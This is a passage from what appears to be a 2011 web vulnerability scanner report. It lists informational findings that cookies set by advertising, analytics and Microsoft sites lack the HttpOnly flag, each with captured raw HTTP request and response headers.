HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4pphdlwc%3D9u%7E*t%28750d%7F2%3B-13143af2894-0x16f
Cache-Control: no-cache
Expires: 0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: A01=ABQAsMSUOAAAAAAAA5QuZsFGR1aCzORA; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
Set-Cookie: M01=AAAACOACQgAE; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
Set-Cookie: TC01=QBIPKvOUMBAAAEALjElDAAAAAAAQGAAABPkbGAktwIAS1aCQmdiAI; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
Set-Cookie: RUA=D1AQAAATErF7ITAAYZchzOJQkAi5g%2BSQv3HKquZ2UrSVcKqhXgTu2GgiVmuErKwnKU3EYCaSfQGfK4sdpUu7I77It5rkG%2FanWo9FEvGie%2FiCjYBRuz%2Bu%2BZVv%2BrRQ6jwbWnCXh61dKhTowAEb5BjV%2B5KPdxZawyqSMM9g7Pi697Ovt5X8I8Ko%2Ffi7lhEUATgXz%2F%2Bm47HrMTGxCPDyF%2F3CYZ; Domain=main.ebayrtm.com; Expires=Thu, 18-Jul-2013 18:36:18 GMT; Path=/rtm
Set-Cookie: RUP=D1AQAAATErF7ITAAZS1xanS0Gk9aSM%2BmfKsGDaavNO5bWn4V4sSMYKOyEr1u1UDyQ*; Domain=ebayrtm.com; Expires=Thu, 18-Jul-2013 18:36:18 GMT; Path=/rtm
Set-Cookie: HT=1311100529004%02433%04165364%06142708%03829%04-1%060%03827%04-1%060%03825%04174461%06154106%03699%04-1%060%031595%04184241%06144661%03912%04-1%060%03974%04-1%060%03973%04187759%06167625%03876%04-1%060%031651%04-1%060%03813%04-1%060%031650%04-1%060%03283%04153923%0699446%03280%04153917%0699446; Domain=main.ebayrtm.com; Path=/rtm
Content-Type: application/x-javascript;charset=UTF-8
Content-Length: 72197
Date: Tue, 19 Jul 2011 18:36:17 GMT

try{vjo.dsf.assembly.VjClientAssembler._callback0([
{"id":"1595","mid":"184241","iid":"1457744126094707453","type":"html","width":"-1","height":"-1","content":"<body>\n <div class=\"pi\">\n<div cl
...[SNIP]...

14.127. https://ssl.bing.com/travel/secure/account/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl.bing.com
Path:   /travel/secure/account/overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /travel/secure/account/overview?FORM=TRGRMR HTTP/1.1
Host: ssl.bing.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lbc=318; JSESSIONID=E9781CDFFAE578D97F1CEE56FE6B125F; ETID=BCID-z62stftdmjtffpyz5v577d2o9v13o_VID-2a4fcb0ot2i3byz5nk9raqul1bf3_UID-; s_cc=true; s_sq=%5B%5BB%5D%5D; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; SRCHUID=V=2&GUID=7F073A8D66F24C72BB90F3E48AA61B8A; _msaId=d8678782_61_15534038; _FP=; MUID=E361C23374E642C998D8ABA7166A75EC; SRCHD=MS=1865664&SM=1&D=1769857&AF=BMMENO; _SS=SID=2FF6BBE251234F40B4038D899CDFDA5D&hIm=796; RMS=F=OC; _HOP=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private, no-store, max-age=0
Content-Length: 0
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311118711&rver=6.1.6195.0&wp=LBI&wreply=https:%2F%2Fssl.bing.com%2Fsecure%2Fpassport.aspx%3Frequrl%3Dhttp%253A%252F%252Fssl.bing.com%252Ftravel%252Fsecure%252Faccount%252Foverview%253FFORM%253DTRGRMR%2526wlidtobt&lc=1033&id=264960
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 23:38:32 GMT
Connection: keep-alive
Set-Cookie: _HOP=I=2&TS=1311118711; domain=.bing.com; path=/


14.128. http://statse.webtrendslive.com/dcs2jv4o900000oa88gtwa3au_6v2h/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcs2jv4o900000oa88gtwa3au_6v2h/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs2jv4o900000oa88gtwa3au_6v2h/dcs.gif?&dcsdat=1311085235630&dcssip=www.numarasoftware.com&dcsuri=/welcome/service_desk.aspx&dcsqry=%3Fsrc=google%26trm=issue_tracking_software&WT.co_f=173.193.214.243-1234505376.30151644&WT.vtid=173.193.214.243-1234505376.30151644&WT.vtvs=1311085235633&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=9&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=/welcome/service_desk.aspx&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1065x723&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.numarasoftware.com/welcome/service_desk.aspx&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&trm=issue_tracking_software
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAASAAAADroAABtA0U3lP9FNFf8AAHZR0U1aUdFNJugAAExR0k2LT9JNP/0AAAdQ0k2xT9JNPv0AAEZR0k04UNJNCJkAAGqN301qjd9NFd8AAFB97k3dfO5NOrkAALl98k25ffJN91EAAGxC+U1rQvlNfA0BAKzD+00jwftNLbAAAH6i/k18ov5NQKYAAOI4/03gOP9NjdYAAN3DBE6bwwROi4cAAOQfDU7kHw1OBMgAAHv8HE7u+xxOzEsAAH2IHU5PiB1OyuYAAA+THU4Pkx1On/oAADPmJE4a5SROEAAAAEkfAAAbQNFN5T/RTXtQAAB2UdFNWlHRTR5MAABMUdJNi0/STQgrAABqjd9Nao3fTUFNAABQfe5N3XzuTcxEAAC5ffJNuX3yTSUiAABsQvlNa0L5Tc5SAACsw/tNI8H7TURFAAB+ov5NfKL+TaI8AADiOP9N4Dj/TUVFAADdwwROm8METs84AADkHw1O5B8NTsZJAAB7/BxO7vscTmseAAB9iB1OT4gdTlhMAAAPkx1OD5MdTkpQAAAz5iROGuUkTgEAAAAEyAAAIzE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 14:20:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAATAAAADroAABtA0U3lP9FNFf8AAHZR0U1aUdFNJugAAExR0k2LT9JNP/0AAAdQ0k2xT9JNPv0AAEZR0k04UNJNCJkAAGqN301qjd9NFd8AAFB97k3dfO5NOrkAALl98k25ffJN91EAAGxC+U1rQvlNfA0BAKzD+00jwftNLbAAAH6i/k18ov5NQKYAAOI4/03gOP9NjdYAAN3DBE6bwwROi4cAAOQfDU7kHw1OBMgAAHv8HE7u+xxOzEsAAH2IHU5PiB1OyuYAAA+THU4Pkx1On/oAADPmJE4a5SROnPoAAKySJU6skiVOEQAAAEkfAAAbQNFN5T/RTXtQAAB2UdFNWlHRTR5MAABMUdJNi0/STQgrAABqjd9Nao3fTUFNAABQfe5N3XzuTcxEAAC5ffJNuX3yTSUiAABsQvlNa0L5Tc5SAACsw/tNI8H7TURFAAB+ov5NfKL+TaI8AADiOP9N4Dj/TUVFAADdwwROm8METs84AADkHw1O5B8NTsZJAAB7/BxO7vscTmseAAB9iB1OT4gdTlhMAAAPkx1OD5MdTkpQAAAz5iROGuUkTgZQAACskiVOrJIlTgEAAAAEyAAAIzE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0; path=/; expires=Fri, 16-Jul-2021 14:20:28 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

14.129. https://support.discoverbing.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.discoverbing.com
Path:   /Default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.aspx?&st=1&wfxredirect=1 HTTP/1.1
Host: support.discoverbing.com
Connection: keep-alive
Referer: http://onlinehelp.microsoft.com/en-us/bing/ff808415.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1307200261952; bingresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22DDINPROGRESS%22%2C%22url%22%3A%22http%253A//social.discoverbing.com/%22%2C%22timestamp%22%3A1307372850950%7D%2C%22lastinvited%22%3A1307372850950%2C%22userid%22%3A%221307361123212927392730955034%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p102855664%22%5D%7D; s_cc=true; s_vnum=1313680622771%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 19 Jul 2011 15:18:11 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: scrx=1; expires=Thu, 19-Jul-2012 15:18:11 GMT; path=/
Set-Cookie: MSIDCookie=b3669c96-3886-4430-9363-3e7a37fa4b8a; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Vary: Accept-Encoding
Content-Length: 23919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...

14.130. http://t2.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t2.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trackalyze.asp?r=http%3A//www.axosoft.com/ontime&p=http%3A//www.axosoft.com/ontime/bug_tracking&i=18629 HTTP/1.1
Host: t2.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.axosoft.com/ontime/bug_tracking
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=251737230614108; ASPSESSIONIDSSDCBDSR=AELIBEPBNDEEFGNGIGDFIMHO; loop=http%3A%2F%2Fwww%2Eaxosoft%2Ecom%2Fontime; ASPSESSIONIDQQBBCCTR=IPJNGPLCKGCCBBMNKNANFDCF

Response

HTTP/1.1 302 Object moved
Date: Tue, 19 Jul 2011 14:20:06 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Eaxosoft%2Ecom%2Fontime%2Fbug%5Ftracking; expires=Wed, 20-Jul-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>

14.131. http://tags.bluekai.com/site/2731  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2731

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2731 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bk=6XdZv65dzaRBvF/1; bkc=KJh56qXFOWWDOdeFfvTyNGdKM0QPG+oWmJUti7UPDPhz/NaoaD5Y/+K/QrjWJ8WnmDJhP9it2a2/61Qka6sDlMFKpqt+Jod12XNXJ2wGOToPQ2Vg65McXUYec/Ngayv67HMQzQiTUCInwjHSFAijXIvve8x0ysNATh94uIpZMwjg0F+Et7LoXd7LwMnlmfaK38XcQwltRoxwEfPFvL87FDY2egp7Htnpf2Z0B+X7Fi4qOYQ4tqS4JgD8nlTAC8E4tccmgtkpUkyq9YqmeHjV7eXeqzbnO6Bbfpzy7lwmH+3zat2t9EInycwVrHCGapgzocbflxjJ8mhdxEAUSFmXrWofZHbeCy8woXh8LSU8rTmddhDFqtFwqV7pvFTa6IvJwy==; bko=KJyp8Z5QSB6ibX4/zaZRQuWUpOvsLbf9VuWi1BRABQSsVxLTdUQRfF901BppTFHMRk9aLQTRzyJkWTsLwV9V9sVbWAQ=; bkst=KJhMR5Mwhz9QyreG3sL99RSVhGqZOCRZHrS+YpM2VOQm9rPPsWy1nY61AhmB5RtEpRNNEj/BMcD+eYhu5Pw1eYNEDoBBW+11DtrbxmGF9BVp18EZjK4kkI45Xy/J4x9vYEmRs8LSVHQjsorRsOLRVOQRskQRcM/su4Bp1yYO4yY/fzrBoBLqnBuYvqxDvYEBTmpGsrp3ct7QsrTEkHZuqOHDjHHujHaCSaRSKQOLXYGIOQRKCQecGO9dNbeT6aOwkdO6AniN9JvJeYtz4QeDTpy5; bkw5=KJhgDsHQRmeSh19aoWxjTMDRsOQjmn7tEZ5QIvzaA47c01e9hoeQCoY8oytDARnGWVYRRTixtSvn1WtxTjGHxrRDAGyxyNXAsUj2CsZYe/TZYOAwG1A1cJLREQ9ocQRZqTu13QDeQ8wZJQRNJQRsaGjXn8e1BmRwkQy1ZkYjmvYgmHkvQEJ1xetmeD9KP6Gp96mCa59ypA61UhCO1rctYJ6vxnRph6WsWsOAKsRwA7dnrlLS/8YzrRvHG5tOQuaBRCBeYkMIoxwWBDOMs90z/m8XO3uTsHRCr4mqOXEUa2QjsaQjsJaAOnhOiiW0n9p1ue/wFuabH1eCLx+J8GQdA9NlRUyQi/uTXOvvEY3uMWG9zFhKe6YRhCV/gmzoAofjvevBxxQj9vJBUOx=; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E1015bioI/c9WjcOjX=; bklc=4e25ec55; bkdc=res

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:29 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Wed, 20 Jul 2011 20:43:29 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=DLpRi65dzaRBvF/1; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56ENn96WxOrOlf686wE2bwfODWvLe6PMjoMCEHR+QsLcvNi/vYoJsnnuJt9AueYoJWSNDNYF2a6v6Wus/i3DpAVWpP06wIXfmfs8iQ1R/zn1NWULGMuqAKL3aywkMWYCVeESrht14jhNcA23zaN5XGJxOfi/qCdCzjq47+P2EwogPwA0jptzwAn74r4DbdEy9fnKVDEboS52V7YdfQVREK1IwAP+Ef/V0BFzEw8O+9oHwqDhw9dqpMeq7hDdAAwnqIXf8EVlmi0IsQmAgQIPN8b29ZdwiTjerIy1L8j0pAEq7hEL2ymXvXJJNnQqSCublSqbeUG1AzFSdGjyn+qkKUvV2EJdOR847DrSXtan2d4cddTgU2gxU5fP8a4XOYOi1jQ==; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101u8XGIGc9W5lOCL=; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Wed, 20-Jul-2011 20:43:29 GMT; path=/; domain=.bluekai.com
BK-Server: 4a4
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

14.132. http://tags.bluekai.com/site/450  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/450

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/450 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bk=HisbCW5dzaRBvF/1; bkc=KJh56g2n9pWDOdOFKiKS7Mdt3MCtWvze6E385MQfPR5iabaEPyzPavunmmCuzHmAvaULDJNDNOF2nyHNWSs/i3wFVjfor0UJCl0EkTEWOZCkQvFNiRisivZ8unMAm2z2RY6cl/xtYFYhpmf1SgXAFeI+FjzyfXXKJnXw9uztCKgkKJuiKrpUjbBXKvo2U5zrBfgtzepvegwSUW2XkQqSqKY+mwjlwdjzEjFpTMr0MRcSA4llT8xt8XDw8/e0spFmhPP+pGrqyXeArzaih47ENISXKYuQ2dAsaQgmIPYqXInBwrO7YUMvm852fPvwmluIlUbemcEtF3OzYnH8FqCOzfAOQdLKp0E1Kqsk2qzcl4XQU+7V7+du8kfXYhy2Cl6=; bko=KJyp8Z5QSB6ibX4/zaZRQuWUpOvsLbf9VuWi1BRABQSsVxLTdUQRfF901BppTFHMRk9aLQTRzyJkWTsLwV9V9sVbWAQ=; bkst=KJhMR5Mwhz9QyreG3sL99RSVhGqZOCRZHrS+YpM2VOQm9rPPsWy1nY61AhmB5RtEpRNNEj/BMcD+eYhu5Pw1eYNEDoBBW+11DtrbxmGF9BVp18EZjK4kkI45Xy/J4x9vYEmRs8LSVHQjsorRsOLRVOQRskQRcM/su4Bp1yYO4yY/fzrBoBLqnBuYvqxDvYEBTmpGsrp3ct7QsrTEkHZuqOHDjHHujHaCSaRSKQOLXYGIOQRKCQecGO9dNbeT6aOwkdO6AniN9JvJeYtz4QeDTpy5; bkw5=KJhgDsHQRmeSh19aoWxjTMDRsOQjmn7tEZ5QIvzaA47c01e9hoeQCoY8oytDARnGWVYRRTixtSvn1WtxTjGHxrRDAGyxyNXAsUj2CsZYe/TZYOAwG1A1cJLREQ9ocQRZqTu13QDeQ8wZJQRNJQRsaGjXn8e1BmRwkQy1ZkYjmvYgmHkvQEJ1xetmeD9KP6Gp96mCa59ypA61UhCO1rctYJ6vxnRph6WsWsOAKsRwA7dnrlLS/8YzrRvHG5tOQuaBRCBeYkMIoxwWBDOMs90z/m8XO3uTsHRCr4mqOXEUa2QjsaQjsJaAOnhOiiW0n9p1ue/wFuabH1eCLx+J8GQdA9NlRUyQi/uTXOvvEY3uMWG9zFhKe6YRhCV/gmzoAofjvevBxxQj9vJBUOx=; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E1015bioI/c9WjcOjX=; bklc=4e242eb4

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:01 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e25ec55; expires=Thu, 21-Jul-2011 20:43:01 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=6XdZv65dzaRBvF/1; expires=Sun, 15-Jan-2012 20:43:01 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56qXFOWWDOdeFfvTyNGdKM0QPG+oWmJUti7UPDPhz/NaoaD5Y/+K/QrjWJ8WnmDJhP9it2a2/61Qka6sDlMFKpqt+Jod12XNXJ2wGOToPQ2Vg65McXUYec/Ngayv67HMQzQiTUCInwjHSFAijXIvve8x0ysNATh94uIpZMwjg0F+Et7LoXd7LwMnlmfaK38XcQwltRoxwEfPFvL87FDY2egp7Htnpf2Z0B+X7Fi4qOYQ4tqS4JgD8nlTAC8E4tccmgtkpUkyq9YqmeHjV7eXeqzbnO6Bbfpzy7lwmH+3zat2t9EInycwVrHCGapgzocbflxjJ8mhdxEAUSFmXrWofZHbeCy8woXh8LSU8rTmddhDFqtFwqV7pvFTa6IvJwy==; expires=Sun, 15-Jan-2012 20:43:01 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Wed, 20-Jul-2011 20:43:01 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Wed, 20 Jul 2011 20:43:01 GMT
Cache-Control: max-age=86400, private
BK-Server: a96f
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

14.133. http://tap.rubiconproject.com/oz/feeds/targus/profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/targus/profile?p=targus&oz_source=partner&segment=000&zip=&dob=&gender=&pc= HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/detail/a_id/861/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; put_2211=2814750682866683; rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1; cd=false; dq=98|8|90|0; khaos=GOVBRMNC-I-DXQD

Response

HTTP/1.1 204 No Content
Date: Tue, 19 Jul 2011 20:27:49 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Wed, 18-Jul-2012 20:27:49 GMT; Path=/
Set-Cookie: dq=100|10|90|0; Expires=Wed, 18-Jul-2012 20:27:49 GMT; Path=/
Set-Cookie: xdp_ti="19 Jul 2011 20:27:49 GMT"; Version=1; Max-Age=604800; Path=/
Set-Cookie: lm="19 Jul 2011 20:27:49 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


14.134. http://tap.rubiconproject.com/oz/sensor  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/sensor?p=rubicon&pc=7664/12228&cd=false&xt=14&k=customer+support:224,games:212,game:128,gamehouse+customer:80,call+center:64,center+hours:64,chat+hours:64,support:62,download+game:60,free+game:60,customer:58,gamehouse:56,hidden+object:56,pc+games:48,time+management:48,mac+games:48,match+3:48,downloadable+games:40,download+games:40,free+games:40,game+daily:40,favorite+download:40,games+now:40,831+5895:40,email+us:40,call+us:40,866+831:40,1+866:40,us+1:40,top+games:40,support+team:36,center+hour:32,super+saver:32,object+games:32,chat+hour:32,hours:32,mortimer+beckett:24,adventure+games:24,strategy+games:24,management+games:24,&t=Contact+GameHouse+Customer+Support HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; khaos=GOVBRMNC-I-DXQD; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; dq=95|8|87|0; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; put_2211=2814750682866683; rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1

Response

HTTP/1.1 204 No Content
Date: Tue, 19 Jul 2011 20:26:08 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Wed, 18-Jul-2012 20:26:08 GMT; Path=/
Set-Cookie: dq=97|8|89|0; Expires=Wed, 18-Jul-2012 20:26:08 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


14.135. http://video.msn.com/services/user/info  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.msn.com
Path:   /services/user/info

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/user/info?callback=jsonp1311088599886&responseEncoding=json&uxmkt=en-US HTTP/1.1
Host: video.msn.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/about-bing/bing-video/1hh72z4pd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
